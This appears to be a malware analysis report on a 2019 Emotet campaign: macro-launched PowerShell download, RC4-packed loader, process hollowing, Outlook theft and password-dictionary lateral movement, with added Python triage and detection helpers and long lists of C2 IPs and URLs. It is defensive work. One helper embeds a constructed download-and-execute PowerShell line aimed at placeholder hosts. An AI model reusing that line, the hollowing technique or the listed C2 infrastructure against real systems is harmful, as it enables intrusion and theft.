Emotet is a banking trojan that spreads by email and tricks the recipient into running malicious code. First seen in 2014 and still active today, it also has a footprint in China, and its aggressive anti-antivirus tactics make it a persistent and difficult adversary.
On 23 September 2019 the QiAnXin (奇安信) Virus Response Center issued an Emotet threat alert. Through continued tracking, it has recently identified multiple Emotet spear-phishing emails carrying malicious macro code. The email lures the user into enabling macros; the macro then uses PowerShell to download and execute the next-stage payload. The attack modules in this campaign include an Outlook data theft module and a lateral movement module.
The sample's execution flow is as follows:
The decoy document is written in English and displays a prompt asking the user to enable macros:
Once the user enables macros, AutoOpen runs automatically and triggers the macro code. AutoOpen ultimately decodes a Base64-encoded PowerShell command and invokes PowerShell to execute it.
The Base64 string and its decoded content are shown below:
After tidying up the decoded Base64 data, it is clear that the script attempts to download the next-stage payload from five different servers in turn and executes it as soon as one download succeeds.
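The decoding step above, as an added triage example that is not part of the original report: a small Python helper that reverses the Base64 encoding of a PowerShell stage and pulls out the download URLs in the order the loop would try them. It assumes the macro hands the script to PowerShell the way `-EncodedCommand` expects it (Base64 over UTF-16LE text); the PowerShell text and its `.invalid` URLs are constructed to mimic the "try several servers" downloader described above and are not the report's indicators.

```python
"""Decode a PowerShell -EncodedCommand blob and extract its download URLs.

Added example for triaging an Emotet macro's PowerShell stage; not code
from the original report. _CONSTRUCTED_PS is a made-up downloader in the
style described above; its URLs are placeholders, not real indicators.
"""
import base64
import re

# Constructed downloader: a list of URLs tried in order, dropped to Temp
# and run on the first success, the behaviour the decoded stage shows.
_CONSTRUCTED_PS = (
    "$urls = 'http://first.example.invalid/wp-content/a1/@"
    "http://second.example.invalid/wp-admin/b2/@"
    "https://third.example.invalid/wp-admin/c3/'.Split('@');"
    "$wc = New-Object System.Net.WebClient;"
    "foreach ($u in $urls) { try { $wc.DownloadFile($u, $env:TEMP + '\\x.exe');"
    " Invoke-Item ($env:TEMP + '\\x.exe'); break } catch {} }"
)


def encode_command(script):
    """powershell -EncodedCommand takes Base64 over UTF-16LE text (assumed here)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Reverse of encode_command; tolerates stripped '=' padding."""
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


# Stops at quotes, the '@' list separator, ';' and ')' so script syntax
# does not leak into the indicator.
_URL_RE = re.compile(r"https?://[^\s'\"<>@;)]+", re.IGNORECASE)


def extract_urls(script):
    """Unique URLs in first-seen order, i.e. the order the loop tries them."""
    seen, out = set(), []
    for url in _URL_RE.findall(script):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def defang(url):
    """hxxp:// and [.] so the indicator cannot be clicked by accident."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}/{path}"


def triage(blob):
    """Encoded command in, defanged download URLs out."""
    return [defang(u) for u in extract_urls(decode_command(blob))]


if __name__ == "__main__":
    for ioc in triage(encode_command(_CONSTRUCTED_PS)):
        print(ioc)
```

The order matters when you hunt: the loader gives up after the first successful download, so the first URL that was live at the time of infection is usually the one that appears in proxy logs.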
Some of the servers hosting the payload in this campaign are compromised hosts, which Emotet also uses to evade detection.
The sample's compile timestamp is 7 October 2019. According to QiAnXin Virus Response Center telemetry, DNS resolutions in China for the five URLs contacted by the PowerShell script almost all begin on 26 October.
The sample is written with MFC. Its functional code is implemented in an exported function: after creating a window, the message handler calls the export nZzNNxCMObNaV.
Every function called from the nZzNNxCMObNaV export is resolved dynamically by name at runtime, and the function names are loaded from the resource section by resource ID.
It then decrypts the shellcode with RC4 and executes it; the key is vGdOmmadpKaisrM:
The decrypted shellcode contains a PE file, which is loaded in memory. This DLL's compile timestamp is 18 October:
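The RC4 step and the embedded PE described above, as an added example that is not the report's own code. It uses the key the report quotes (vGdOmmadpKaisrM) to decrypt a blob, then scans the plaintext for a valid MZ/PE pair and reads ImageBase and AddressOfEntryPoint from the PE32 optional header, the same quantities a loader needs before it can map the file in memory. The encrypted blob is constructed here from a stub prefix plus a minimal PE header, because the real sample is not on the page; the stub bytes and header values are made up.

```python
"""RC4-decrypt a loader's shellcode blob and locate the PE it carries.

Added example, not the report's code. KEY is the one the report gives;
the encrypted blob is CONSTRUCTED from a fake stub plus a minimal PE32
header so the example runs offline.
"""
import struct

KEY = b"vGdOmmadpKaisrM"  # RC4 key quoted in the report


def rc4(key, data):
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def find_pe(blob):
    """Offset of the first 'MZ' whose e_lfanew points at 'PE\\0\\0', else -1."""
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            if blob[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\0\0":
                return pos
        pos = blob.find(b"MZ", pos + 1)
    return -1


def pe_entry(blob, pe_off):
    """(ImageBase, AddressOfEntryPoint) from a PE32 optional header."""
    e_lfanew = struct.unpack_from("<I", blob, pe_off + 0x3C)[0]
    opt = pe_off + e_lfanew + 4 + 20          # past Signature and FileHeader
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic != 0x10B:
        raise ValueError("example handles PE32 (32-bit) images only")
    entry = struct.unpack_from("<I", blob, opt + 16)[0]
    base = struct.unpack_from("<I", blob, opt + 28)[0]
    return base, entry


def build_constructed_blob():
    """Fake position-independent stub followed by a minimal PE32 header (constructed)."""
    stub = b"\xE8\x00\x00\x00\x00\x5B" + b"\x90" * 26   # call $+5; pop ebx; nops
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)             # e_lfanew
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)           # ImageBase
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x2102)
    return stub + bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


PLAIN = build_constructed_blob()
ENCRYPTED = rc4(KEY, PLAIN)   # what the loader would carry in its file


def decrypt_and_locate(enc):
    """Decrypt, find the embedded PE and return (offset, ImageBase, AddressOfEntryPoint)."""
    dec = rc4(KEY, enc)
    off = find_pe(dec)
    if off < 0:
        raise ValueError("no PE image in decrypted data")
    base, entry = pe_entry(dec, off)
    return off, base, entry


if __name__ == "__main__":
    off, base, entry = decrypt_and_locate(ENCRYPTED)
    print(f"PE at blob offset {off:#x}; ImageBase {base:#x}; OEP {base + entry:#x}")
```

ImageBase plus AddressOfEntryPoint is the original entry point (OEP); the process hollowing step later in the report redirects the suspended child to exactly this value once the DLL has been written over the child's image.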
After retrieving its command line, it compares the arguments against "--b57a4fbf" to check whether the expected switch is present. If it is not, it relaunches itself with that argument and exits the current process:
Once started with the argument, it retrieves the disk serial number:
The serial number is formatted and used to build the mutex names:
It creates a mutex named "Global\I90D2908D":
and a mutex named "Global\M90D2908D":
and a mutex named "Global\E90D2908D":
It maps its own file into memory and computes a CRC32 over it:
Retrieves the computer name:
Creates a service named "sketchflow" and starts sketchflow.exe, a copy of itself placed in the system32 directory; the original process then calls ExitProcess.
If OpenSCManager fails before the service can be created, autostart through a service is not possible, so it falls back to the Run registry key to achieve persistence:
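The mutex and persistence artifacts above (the I/M/E mutex triple, the sketchflow service in system32 and the Run-key fallback), as one added triage example that is not the report's own code. It runs over a constructed dict in the shape of a sandbox summary. Assumptions: the mutex format "Global\" plus one letter of I/M/E plus eight upper-case hex digits is inferred from the three names shown, the hex digits are treated as the formatted disk serial, and the Run-key fallback is assumed to point at the same sketchflow.exe copy; the report does not state the Run value's name or data.

```python
"""Triage a host or sandbox artifact report for the Emotet markers above.

Added example, not the report's code. CONSTRUCTED_REPORT is made up; the
mutex pattern and the Run-key target are assumptions noted in comments.
"""
import re
from collections import defaultdict

# Inferred from "Global\I90D2908D", "Global\M90D2908D", "Global\E90D2908D":
# prefix letter plus 8 hex digits, assumed to be the formatted disk serial.
MUTEX_RE = re.compile(r"^Global\\([IME])([0-9A-F]{8})$")
SERVICE_NAME = "sketchflow"          # service name from the report
DROPPED_EXE = "sketchflow.exe"       # self-copy in system32, from the report


def emotet_mutex_serials(mutexes):
    """Serials for which the complete I/M/E triple exists; a lone hit is weak."""
    by_serial = defaultdict(set)
    for name in mutexes:
        m = MUTEX_RE.match(name)
        if m:
            by_serial[m.group(2)].add(m.group(1))
    return sorted(s for s, letters in by_serial.items() if letters == {"I", "M", "E"})


def suspicious_services(services):
    """The sketchflow service whose binary lives under system32."""
    hits = []
    for svc in services:
        if svc["name"].lower() == SERVICE_NAME and "\\system32\\" in svc["image_path"].lower():
            hits.append(svc["name"])
    return hits


def suspicious_run_values(run_values):
    """Run-key values pointing at the dropped copy (assumed fallback target)."""
    return [v for v in run_values
            if v["key"].lower().endswith(r"\currentversion\run")
            and v["data"].lower().endswith(DROPPED_EXE)]


def triage(report):
    """Collect all three indicator classes from one report dict."""
    return {
        "mutex_serials": emotet_mutex_serials(report.get("mutexes", [])),
        "services": suspicious_services(report.get("services", [])),
        "run_values": suspicious_run_values(report.get("run_values", [])),
    }


# Constructed report: one full triple, one stray partial, the service, a benign one.
CONSTRUCTED_REPORT = {
    "mutexes": [
        r"Global\I90D2908D", r"Global\M90D2908D", r"Global\E90D2908D",
        r"Global\IDEADBEEF",                       # partial: not reported
        r"Local\ZonesCounterMutex",                 # benign
    ],
    "services": [
        {"name": "sketchflow", "image_path": r"C:\Windows\system32\sketchflow.exe"},
        {"name": "Spooler", "image_path": r"C:\Windows\System32\spoolsv.exe"},
    ],
    "run_values": [
        {"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
         "name": "sketchflow", "data": r"C:\Windows\system32\sketchflow.exe"},
    ],
}

if __name__ == "__main__":
    print(triage(CONSTRUCTED_REPORT))
```

Requiring the full triple before reporting a serial keeps the rule quiet on unrelated software that happens to use a similar naming scheme; the service and Run-key checks are independent so either persistence path is caught.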
Calls system APIs to collect information about the current system:
Reads the current process's SessionID from the PEB:
Enumerates running processes:
Builds the check-in URL:
Uses the WinINet Http* family of functions to communicate with the server:
If the request succeeds, it calls InternetReadFile to read the server's response; if it fails, it waits 4571 ms via WaitForSingleObject and then repeats the steps above.
Calls CryptDecrypt to decrypt the response:
Allocates memory, fixes up the import table, and creates a thread to load the downloaded payload in memory:
Data downloaded from the server is handled in one of three ways:
First: the data is written to a file and the plugin is launched with CreateProcess:
Second: the data is written to a file and the process can additionally be created in a different session:
Third: CreateThread is called directly to run the shellcode:
During its continued monitoring of Emotet, the QiAnXin Virus Response Center found another version of the Emotet loader. Its basic functionality is unchanged, but the way the embedded encrypted shellcode is handled has changed.
In one variant the encrypted shellcode is stored in an array; in the other it is placed in the resource section and retrieved through FindResourceA and related APIs before being decrypted.
The payload downloaded from the server in this capture actually contains two further attack modules: one steals Outlook data, the other performs lateral movement.
The downloaded payload is executed in memory on a new thread. Dumping it shows that it too is a DLL, with a compile timestamp of 15 October 2019.
When DllMain runs, it first attempts to delete a file in the Temp directory. That file is created by the injected child process and holds the harvested Outlook data:
Allocates memory and unpacks, in memory, the code that will be injected into the child process:
Creates a suspended copy of its own process, passing as the argument the path of the file in which the Outlook data will be saved:
Allocates memory in the child and calls GetThreadContext to obtain the child's thread context; the child's original image is mapped at 0x400000:
Writes the DLL unpacked earlier into the child and calls SetThreadContext to modify the child's thread context so that execution is redirected to the injected code:
The write target in the child is 0x400000, the address at which the child's module was mapped at process initialization. WriteProcessMemory writes the DLL there, overwriting the original image; this injection technique is classic Process Hollowing.
Because the child was created suspended, when its thread is resumed it runs RtlUserThreadStart, whose EAX argument holds the thread's start address, so execution begins at the OEP of the injected DLL.
It then waits for the child process to finish and exit, and reads the data from the Temp file:
Connects to the server, sends the data and waits for a response:
This module is the DLL injected into the child process via SetThreadContext; its compile timestamp is 31 March 2019.
After starting, the DLL queries Outlook's DLLPathEx registry value:
Creates a file in the Temp directory to hold the collected Outlook data:
The payload then harvests Outlook data:
Formats the data, writes it to the Tmp file, and the process exits:
This module is executed directly in memory on a thread.
After starting, it retrieves the computer name and the current process name, and decrypts a username and password dictionary in memory.
The decrypted password dictionary is shown below:
Enumerates network resources in the current network environment:
Attempts to connect to the target servers using the dictionary; on success it copies itself to the target machine and starts the process through a service, achieving lateral movement:
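The lateral movement behaviour above (a credential dictionary tried against network hosts, then a service started on the host that accepted one) leaves a recognisable trail in Windows event logs. As an added detection example that is not the report's own code, the Python below runs over constructed records in the shape of Security events 4625 (failed logon) and 4624 (successful logon) and System event 7045 (service installed), and flags a source that fails against several accounts and then succeeds over the network, escalating when a service is installed on that host shortly afterwards. The flat pipe-separated line format, the host names, addresses, thresholds and the service name in the 7045 line are all assumptions.

```python
"""Detect dictionary logons followed by a new service, from constructed log lines.

Added example, not the report's code. CONSTRUCTED_LOG mimics Security
4625/4624 and System 7045 records in a flat format of this example's own
choosing: ts|host|event_id|source|account|extra. Thresholds are assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_MIN, USERS_MIN = 5, 2        # assumed: failures, and distinct accounts, before we care
WINDOW = timedelta(minutes=5)     # assumed correlation window


def parse(line):
    """One constructed record into a dict; 'extra' carries LogonType or service details."""
    ts, host, eid, src, user, extra = line.split("|", 5)
    return {"ts": datetime.fromisoformat(ts), "host": host, "id": int(eid),
            "src": src, "user": user, "extra": extra}


def detect(lines):
    """Return findings as tuples; 'spray_success' then 'lateral_service'."""
    events = sorted((parse(l) for l in lines), key=lambda e: e["ts"])
    fails = defaultdict(list)     # (target host, source) -> [(ts, account)]
    sprayed = {}                  # target host -> (ts of success, source)
    findings = []
    for e in events:
        key = (e["host"], e["src"])
        if e["id"] == 4625:
            fails[key].append((e["ts"], e["user"]))
        elif e["id"] == 4624 and "LogonType=3" in e["extra"]:   # network logon
            recent = [(t, u) for t, u in fails[key] if e["ts"] - t <= WINDOW]
            users = {u for _, u in recent}
            if len(recent) >= FAIL_MIN and len(users) >= USERS_MIN:
                sprayed[e["host"]] = (e["ts"], e["src"])
                findings.append(("spray_success", e["host"], e["src"], e["user"], len(recent)))
        elif e["id"] == 7045 and e["host"] in sprayed:
            t0, src = sprayed[e["host"]]
            if e["ts"] - t0 <= WINDOW:
                findings.append(("lateral_service", e["host"], src, e["user"], e["extra"]))
    return findings


# Constructed records: one dictionary run that succeeds on the 6th try and is
# followed by a service install, plus a benign single typo on another host.
# The service name in the 7045 line is a placeholder; the report does not say
# what the remote service is called.
CONSTRUCTED_LOG = [
    "2019-10-28T09:00:01|FILESRV01|4625|10.0.0.23|administrator|LogonType=3;Status=0xC000006D",
    "2019-10-28T09:00:02|FILESRV01|4625|10.0.0.23|administrator|LogonType=3;Status=0xC000006D",
    "2019-10-28T09:00:03|FILESRV01|4625|10.0.0.23|admin|LogonType=3;Status=0xC000006D",
    "2019-10-28T09:00:04|FILESRV01|4625|10.0.0.23|admin|LogonType=3;Status=0xC000006D",
    "2019-10-28T09:00:05|FILESRV01|4625|10.0.0.23|backup|LogonType=3;Status=0xC000006D",
    "2019-10-28T09:00:06|FILESRV01|4624|10.0.0.23|backup|LogonType=3",
    "2019-10-28T09:00:09|FILESRV01|7045||backup|ServiceName=placeholder;ImagePath=C:\\Windows\\placeholder.exe",
    "2019-10-28T09:10:00|WS042|4625|10.0.0.77|alice|LogonType=3;Status=0xC000006D",
    "2019-10-28T09:10:05|WS042|4624|10.0.0.77|alice|LogonType=3",
]

if __name__ == "__main__":
    for f in detect(CONSTRUCTED_LOG):
        print(f)
```

Keying on the (target host, source) pair rather than the source alone means a module that walks many hosts with the same dictionary produces one finding per victim host, which is what an incident responder needs in order to scope the spread.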
The QiAnXin Virus Response Center has found multiple related samples. Both the loader and the payload downloaded from the server differ between them, which suggests that the actors behind Emotet are improving functionality while also evading antivirus signatures that would otherwise cluster similar samples together. Judging by the sample behaviour, the main goals of this campaign are collecting host information, stealing Outlook data and moving laterally; the attackers may be laying the groundwork for deeper follow-on intrusion.
The QiAnXin Virus Response Center reminds users not to open unknown emails casually and to stay vigilant in order to prevent attacks by malicious samples of this kind.
All QiAnXin products, including 天擎 (Tianqing), 天眼 (Tianyan), SOC, Situational Awareness (態(tài)勢感知) and the Threat Intelligence Platform (威脅情報平臺), detect the attack activity covered in this report.
hxxp://www.encitmgdk.com/wp-content/jz9j7hptcw-bgwvnoaacn-64826306/
hxxp://new.1communityre.com/wp-admin/NhwvCC/
hxxps://simplecuisine.000webhostapp.com/wp-admin/UOdPpFk/
hxxps://ejerciciosantonio.000webhostapp.com/wp-admin/yds9q9bnpj-gp81uc99l-661630/
hxxps://edu.tizino.com/wvcly/uvsMEaKW/
96.20.84.254
45.56.122.75
85.25.92.96
94.177.253.126
189.166.13.109
212.112.113.235
216.70.88.55
138.186.179.235
95.216.207.86
176.58.93.123
189.132.130.111
75.154.163.1
60.52.64.122
181.36.42.205
143.95.101.72
203.99.188.11
70.45.30.28
110.36.234.146
190.117.206.153
190.55.39.215
186.84.173.153
187.143.219.242
181.47.235.26
185.45.24.254
190.13.146.47
5.189.148.98
190.217.1.149
200.55.168.82
154.120.227.206
162.241.134.130
190.228.212.165
91.109.5.28
190.96.118.15
70.32.94.58
83.169.33.157
190.113.146.128
144.76.62.10
201.217.113.58
216.75.37.196
181.61.143.177
211.229.116.130
157.7.164.178
186.92.11.143
203.99.187.137
187.188.166.192
203.99.188.203
190.16.101.10
201.196.15.79
113.52.135.33
186.109.91.136
189.218.243.150
42.190.4.92
178.249.187.150
138.197.140.163
51.38.134.203
23.253.207.142
186.146.110.108
152.170.220.95
200.90.86.170
192.241.220.183
172.104.70.207
181.197.2.80
http://111.119.233.65/codec/site/
http://190.210.184.138/ban/
http://51.255.165.160/loadan/enabled/raster/merge/
http://45.56.79.249/arizona/
http://163.172.40.218/health/
http://91.205.215.57/stubs/symbols/raster/merge/
http://68.183.170.114/iab/arizona/raster/merge/
http://190.217.1.149/site/add/
http://62.75.160.178/child/sess/
http://200.113.106.18/publish/iab/raster/
http://5.196.35.138/devices/prov/raster/
http://89.188.124.145/prep/devices/raster/
http://89.188.124.145/vermont/srvc/
http://186.23.132.93/entries/ban/scripts/merge/
http://51.15.8.192/loadan/sym/
http://190.38.14.52/usbccid/cone/scripts/merge/
http://217.199.160.224/usbccid/
http://207.154.204.40/report/xian/scripts/
http://142.93.114.137/health/prep/
http://94.183.71.206/iplk/
http://190.104.253.234/pnp/balloon/scripts/
http://212.71.237.140/bml/teapot/scripts/
http://201.163.74.202/publish/scripts/scripts/merge/
http://201.190.133.235/bml/usbccid/
http://186.15.57.7/scripts/child/
http://86.42.166.147/acquire/
http://82.196.15.205/cookies/
http://186.68.141.218/taskbar/ringin/
http://46.28.111.142/scripts/
http://138.68.106.4/health/cookies/scripts/merge/
http://190.10.194.42/child/codec/scripts/merge/
http://104.131.58.132/guids/ban/scripts/merge/
http://190.230.60.129/badge/entries/
http://109.169.86.13/guids/
http://181.44.166.242/merge/tlb/scripts/
http://46.41.151.103/sess/xian/scripts/
http://144.139.158.155/devices/sess/scripts/
http://183.82.97.25/psec/chunk/scripts/merge/
http://149.62.173.247/raster/devices/scripts/
http://81.169.140.14/xian/splash/
http://190.230.60.129/enable/acquire/scripts/merge/
http://77.245.101.134/child/between/scripts/merge/
http://46.29.183.211/acquire/
http://68.183.190.199/balloon/
http://220.241.38.226/guids/arizona/scripts/
http://45.79.95.107/attrib/xian/
http://200.58.83.179/balloon/srvc/
http://190.97.30.167/schema/vermont/scripts/
http://178.79.163.131/symbols/devices/scripts/merge/
http://77.55.211.77/badge/splash/scripts/merge/
http://201.213.32.59/site/acquire/scripts/merge/
http://79.143.182.254/teapot/
http://14.160.93.230/stubs/entries/scripts/
http://178.249.187.151/entries/report/scripts/
http://190.182.161.7/pdf/arizona/
http://181.59.253.20/ringin/jit/scripts/merge/
http://139.5.237.27/results/ringin/scripts/
http://154.120.227.206/ringin/iab/scripts/
http://91.83.93.124/chunk/vermont/
http://181.16.17.210/stubs/cookies/
http://80.85.87.122/jit/balloon/scripts/merge/
http://119.59.124.163/badge/tpt/
http://190.230.60.129/site/raster/scripts/
http://181.135.153.203/cab/enabled/scripts/
http://185.86.148.222/usbccid/entries/
http://46.101.212.195/devices/taskbar/scripts/merge/
http://200.113.106.18/usbccid/symbols/scripts/
http://50.28.51.143/splash/
http://86.6.188.121/report/chunk/
http://62.75.143.100/between/prov/scripts/merge/
http://81.213.215.216/guids/iplk/
http://181.36.42.205/acquire/
http://186.1.41.111/attrib/
http://203.25.159.3/sess/
http://79.127.57.43/jit/window/
http://69.163.33.84/vermont/bml/scripts/merge/
http://190.146.131.105/prep/
http://87.106.77.40/symbols/
http://91.204.163.19/walk/ringin/scripts/
http://94.177.183.28/codec/publish/
http://111.119.233.65/enabled/
http://190.210.184.138/enabled/iplk/scripts/merge/
http://51.255.165.160/forced/
http://45.56.79.249/badge/site/
http://163.172.40.218/arizona/walk/scripts/
http://68.183.170.114/badge/merge/scripts/
http://62.75.160.178/usbccid/taskbar/
http://200.113.106.18/json/forced/scripts/
http://89.188.124.145/sym/img/scripts/
http://186.23.132.93/badge/prep/scripts/merge/
http://51.15.8.192/ringin/vermont/scripts/merge/
http://190.38.14.52/json/devices/scripts/merge/
http://217.199.160.224/cookies/splash/scripts/merge/
http://207.154.204.40/attrib/json/raster/
http://94.183.71.206/glitch/enabled/raster/
http://212.71.237.140/between/taskbar/raster/merge/
http://201.163.74.202/loadan/loadan/
http://201.190.133.235/odbc/img/
http://186.15.57.7/cab/srvc/raster/
http://86.42.166.147/scripts/attrib/
http://82.196.15.205/report/devices/
http://186.68.141.218/attrib/tpt/raster/
http://46.28.111.142/attrib/json/
http://138.68.106.4/forced/window/raster/
http://190.10.194.42/splash/
http://104.131.58.132/schema/cone/raster/
http://190.96.118.15/health/report/raster/
http://190.230.60.129/loadan/xian/
http://109.169.86.13/cone/
http://181.44.166.242/enabled/chunk/raster/
http://46.41.151.103/schema/iplk/
http://144.139.158.155/sym/badge/raster/
http://183.82.97.25/jit/
http://149.62.173.247/health/pnp/
http://81.169.140.14/loadan/enabled/raster/
http://190.230.60.129/symbols/
http://159.203.204.126/acquire/child/raster/
http://77.245.101.134/publish/symbols/raster/merge/
http://46.29.183.211/balloon/pdf/raster/merge/
http://68.183.190.199/json/chunk/raster/
http://220.241.38.226/jit/vermont/
http://45.79.95.107/chunk/devices/
http://190.97.30.167/srvc/health/raster/merge/
http://178.79.163.131/results/walk/raster/
http://190.120.104.21/acquire/raster/
http://77.55.211.77/iplk/enabled/
http://201.213.32.59/health/between/raster/merge/
http://79.143.182.254/report/cone/raster/merge/
http://14.160.93.230/schema/arizona/raster/
http://178.249.187.151/child/xian/
http://190.182.161.7/between/
http://181.59.253.20/srvc/prov/raster/merge/
http://139.5.237.27/scripts/cookies/raster/
http://154.120.227.206/codec/balloon/raster/
http://91.83.93.124/cookies/splash/
http://181.16.17.210/enable/json/raster/merge/
http://80.85.87.122/rtm/
http://119.59.124.163/ringin/usbccid/
http://190.230.60.129/iplk/
http://181.135.153.203/loadan/
http://185.86.148.222/loadan/tlb/raster/
http://46.101.212.195/prov/
http://200.113.106.18/window/
http://201.184.41.228/stubs/enable/
http://50.28.51.143/window/
http://86.6.188.121/arizona/balloon/raster/merge/
http://62.75.143.100/prep/tpt/raster/
http://81.213.215.216/loadan/json/
http://181.36.42.205/entries/
http://186.1.41.111/enable/glitch/raster/merge/
http://203.25.159.3/cab/
http://79.127.57.43/loadan/forced/raster/
http://69.163.33.84/raster/pdf/raster/
http://41.75.135.93/tlb/nsip/
http://190.146.131.105/arizona/publish/raster/merge/
http://87.106.77.40/raster/vermont/raster/merge/
http://91.204.163.19/prep/iplk/raster/merge/
http://94.177.183.28/vermont/odbc/
http://51.254.218.210/iab/attrib/acquire/merge/
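The indicator list above mixes defanged payload URLs (hxxp), bare C2 IP addresses and C2 URLs, and as published it contains a few exact duplicates and one entry with a stray trailing quote. As an added example that is not part of the report, the Python below normalises such a list into deduplicated, refanged sets and merges the hosts of the C2 URLs into the IP blocklist, while keeping the path per host so a detection can match host and URI together (the path words alone are generic). SAMPLE is a constructed subset of the page's own lines.

```python
"""Normalise a mixed IOC list (defanged URLs, IPs, URLs) into clean sets.

Added example, not part of the report. SAMPLE is a constructed subset of
the page's indicators, chosen to include one duplicate and the entry with
a stray trailing quote.
"""
import ipaddress
from urllib.parse import urlsplit

SAMPLE = [
    "hxxp://www.encitmgdk.com/wp-content/jz9j7hptcw-bgwvnoaacn-64826306/",
    "hxxps://edu.tizino.com/wvcly/uvsMEaKW/",
    "96.20.84.254",
    "190.217.1.149",
    "http://104.131.58.132/guids/ban/scripts/merge/",
    "http://104.131.58.132/guids/ban/scripts/merge/",      # exact duplicate on the page
    "http://190.217.1.149/site/add/",                       # host already in the IP list
    'http://185.86.148.222/loadan/tlb/raster/"',            # stray quote on the page
]


def refang(raw):
    """Undo hxxp / [.] defanging and drop whitespace and stray quotes."""
    return raw.strip().strip('"').replace("hxxp", "http").replace("[.]", ".")


def is_ip(text):
    """True for a syntactically valid IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def parse(lines):
    """Split the list into unique URLs and unique bare IPs; reject anything else."""
    urls, ips = set(), set()
    for raw in lines:
        s = refang(raw)
        if not s:
            continue
        if "://" in s:
            urls.add(s)
        elif is_ip(s):
            ips.add(s)
        else:
            raise ValueError(f"unrecognised indicator line: {raw!r}")
    return sorted(urls), sorted(ips, key=ipaddress.ip_address)


def blocklist(lines):
    """IPs (bare ones plus URL hosts that are IPs), domains, and paths per host."""
    urls, ips = parse(lines)
    hosts = {urlsplit(u).hostname for u in urls}
    ip_hosts = {h for h in hosts if is_ip(h)}
    by_host = {}
    for u in urls:
        parts = urlsplit(u)
        by_host.setdefault(parts.hostname, []).append(parts.path)
    return {
        "ips": sorted(set(ips) | ip_hosts, key=ipaddress.ip_address),
        "domains": sorted(hosts - ip_hosts),
        "paths_by_host": {h: sorted(p) for h, p in by_host.items()},
    }


if __name__ == "__main__":
    result = blocklist(SAMPLE)
    print("\n".join(result["ips"]))
    print("\n".join(result["domains"]))
    for host, paths in result["paths_by_host"].items():
        print(host, paths)
```

Sorting IPs numerically rather than lexically keeps the output stable across runs and makes diffs against a previous version of the list meaningful; raising on an unrecognised line is deliberate, since a silently skipped indicator is worse than a parse error you notice.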